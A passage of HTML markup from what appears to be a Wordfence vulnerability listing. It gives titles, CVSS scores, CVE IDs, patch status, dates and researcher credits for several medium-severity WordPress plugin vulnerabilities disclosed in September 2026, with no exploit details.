<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-express-checkout" target="_blank" rel="noopener">WP Express Checkout (Fast Payments via PayPal &amp; Stripe)</a> <span class="wfvr-software-slug">[wp-express-checkout]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryan-zegar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e7f560ae3c1ec62624c1faba47f48d38.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e7f560ae3c1ec62624c1faba47f48d38"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryan-zegar" target="_blank" rel="noopener">Ryan Zegar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74df81cd-8cea-4545-86d0-eea2fdf75457" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33872127-335e-4a1d-992e-fee27537867e" target="_blank" rel="noopener">Flexible Quantity – Measurement Price Calculator for WooCommerce &lt;= 2.3.21 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62136" target="_blank" rel="noopener noreferrer">							CVE-2026-62136						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/flexible-quantity-measurement-price-calculator-for-woocommerce" target="_blank" rel="noopener">Flexible Quantity – Measurement Price Calculator for WooCommerce</a> <span class="wfvr-software-slug">[flexible-quantity-measurement-price-calculator-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33872127-335e-4a1d-992e-fee27537867e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8fdf07b3-30f2-4b9c-a0c1-b6775a437e02" target="_blank" rel="noopener">IMPress for IDX Broker &lt;= 3.3.0 &#8211;  Unauthenticated Unauthorized Lead and Search Manipulation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81787" target="_blank" rel="noopener noreferrer">							CVE-2026-81787						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/idx-broker-platinum" target="_blank" rel="noopener">IMPress for IDX Broker</a> <span class="wfvr-software-slug">[idx-broker-platinum]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8fdf07b3-30f2-4b9c-a0c1-b6775a437e02" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ad83579-aaf4-4303-8ce4-4790e6d729ef" target="_blank" rel="noopener">IP2Location Country Blocker &lt;= 2.44.0 &#8211; IP Soofing</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82530" target="_blank" rel="noopener noreferrer">							CVE-2026-82530						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ip2location-country-blocker" target="_blank" rel="noopener">IP2Location Country Blocker</a> <span class="wfvr-software-slug">[ip2location-country-blocker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amirsun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3e148f2a544c8a60d6a0362d2cbc870.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3e148f2a544c8a60d6a0362d2cbc870"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amirsun" target="_blank" rel="noopener">AmirSUN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ad83579-aaf4-4303-8ce4-4790e6d729ef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f48ee6c-147b-4461-ae45-fe10a930f036" target="_blank" rel="noopener">JetFormBuilder — Dynamic Blocks Form Builder &lt; 3.6.5.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19858" target="_blank" rel="noopener noreferrer">							CVE-2026-19858						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetformbuilder" target="_blank" rel="noopener">JetFormBuilder — Dynamic Blocks Form Builder</a> <span class="wfvr-software-slug">[jetformbuilder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f48ee6c-147b-4461-ae45-fe10a930f036" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aad053ac-d01f-4f89-abca-28b9fce4f249" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer 6.2.1 &#8211; 6.2.5 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84222" target="_blank" rel="noopener noreferrer">							CVE-2026-84222						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aad053ac-d01f-4f89-abca-28b9fce4f249" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef9eac3a-600c-4e4d-bfe1-47fafa37141a" target="_blank" rel="noopener">Loops &amp; Logic &lt;= 4.2.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16960" target="_blank" rel="noopener noreferrer">							CVE-2026-16960						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tangible-loops-and-logic" target="_blank" rel="noopener">Loops &amp; Logic</a> <span class="wfvr-software-slug">[tangible-loops-and-logic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bb525902f3ac5c4bbe1c6fb9fa9a0b4d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bb525902f3ac5c4bbe1c6fb9fa9a0b4d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener">Philipp Doblhofer</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef9eac3a-600c-4e4d-bfe1-47fafa37141a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7cb243-a57b-42cc-bee4-ca66a2e1614b" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates 1.3.1 &#8211; 2.3.3 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82848" target="_blank" rel="noopener noreferrer">							CVE-2026-82848						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7cb243-a57b-42cc-bee4-ca66a2e1614b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4dece711-f603-4133-aa15-5bb2bec381b6" target="_blank" rel="noopener">MetForm – Contact Form, Survey, Quiz, Conditional Forms, Form Templates &amp; Custom Form Builder for Elementor &lt; 4.1.9 &#8211; Unauthenticated Email Header Injection</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86813" target="_blank" rel="noopener noreferrer">							CVE-2026-86813						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metform" target="_blank" rel="noopener">MetForm – Contact Form, Survey, Quiz, Conditional Forms, Form Templates &amp; Custom Form Builder for Elementor</a> <span class="wfvr-software-slug">[metform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4dece711-f603-4133-aa15-5bb2bec381b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d3860f-617d-4642-9346-de68e197b202" target="_blank" rel="noopener">miniOrange 2FA – Two Factor Authentication for WordPress (OTP, SMS, Email, Google Authenticator) 6.2.8 &#8211; 6.3.0 &#8211; Unauthenticated Second Factor Authentication Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77771" target="_blank" rel="noopener noreferrer">							CVE-2026-77771						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-2-factor-authentication" target="_blank" rel="noopener">miniOrange 2FA – Two Factor Authentication for WordPress (OTP, SMS, Email, Google Authenticator)</a> <span class="wfvr-software-slug">[miniorange-2-factor-authentication]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pervinzahidli" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/795788b737d92810c0c19e0512745692.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="795788b737d92810c0c19e0512745692"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pervinzahidli" target="_blank" rel="noopener">pervinzahidli</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d3860f-617d-4642-9346-de68e197b202" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21ede7f9-12ee-49ef-b645-b7cf3771ebd2" target="_blank" rel="noopener">Mobile Events Manager &lt;= 1.4.8.3 &amp; MDJM Event Management &lt; 1.7.8.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88802" target="_blank" rel="noopener noreferrer">							CVE-2026-88802						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Partially Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-dj-manager" target="_blank" rel="noopener">MDJM Event Management</a> <span class="wfvr-software-slug">[mobile-dj-manager]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-events-manager" target="_blank" rel="noopener">Mobile Events Manager</a> <span class="wfvr-software-slug">[mobile-events-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/claudio-marchesini-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c02b90fc5c8f1415e07705b0e258922.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c02b90fc5c8f1415e07705b0e258922"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/claudio-marchesini-2" target="_blank" rel="noopener">Claudio Marchesini</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21ede7f9-12ee-49ef-b645-b7cf3771ebd2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23782888-eff0-4996-8369-6a19459248a4" target="_blank" rel="noopener">Nexi XPay Build 7.6.1 &#8211; 7.6.2 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82213" target="_blank" rel="noopener noreferrer">							CVE-2026-82213						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nexi-xpay-build" target="_blank" rel="noopener">Nexi XPay Build</a> <span class="wfvr-software-slug">[nexi-xpay-build]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4d4f022dc9a23568fb89d3b328e6cb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4d4f022dc9a23568fb89d3b328e6cb2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener">Ryan Fabella</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23782888-eff0-4996-8369-6a19459248a4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bd4b379-6d7d-4cfe-bb16-a931c5d68d02" target="_blank" rel="noopener">OTP Login &amp; Register Woocommerce &lt;= 2.7.2 &#8211; Unauthenticated Authentication Bypass via Brute Force</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12215" target="_blank" rel="noopener noreferrer">							CVE-2026-12215						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-login-woocommerce" target="_blank" rel="noopener">OTP Login &amp; Register Woocommerce</a> <span class="wfvr-software-slug">[mobile-login-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/d4ngvn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8d90952f7631b32dd1745870eb5adb6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d90952f7631b32dd1745870eb5adb6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/d4ngvn" target="_blank" rel="noopener">d4ngvn</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bd4b379-6d7d-4cfe-bb16-a931c5d68d02" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e4d539a3-9fb0-4ab0-84c4-31fc68f69825" target="_blank" rel="noopener">Passster – Password Protect Pages and Content &lt;= 4.3.13 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62114" target="_blank" rel="noopener noreferrer">							CVE-2026-62114						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-protector" target="_blank" rel="noopener">Passster – Password Protect Pages and Content</a> <span class="wfvr-software-slug">[content-protector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/salua-es-sair" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b4ada50fdfd87b78eae518aca8950c13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b4ada50fdfd87b78eae518aca8950c13"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/salua-es-sair" target="_blank" rel="noopener">Salúa Es-sair</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
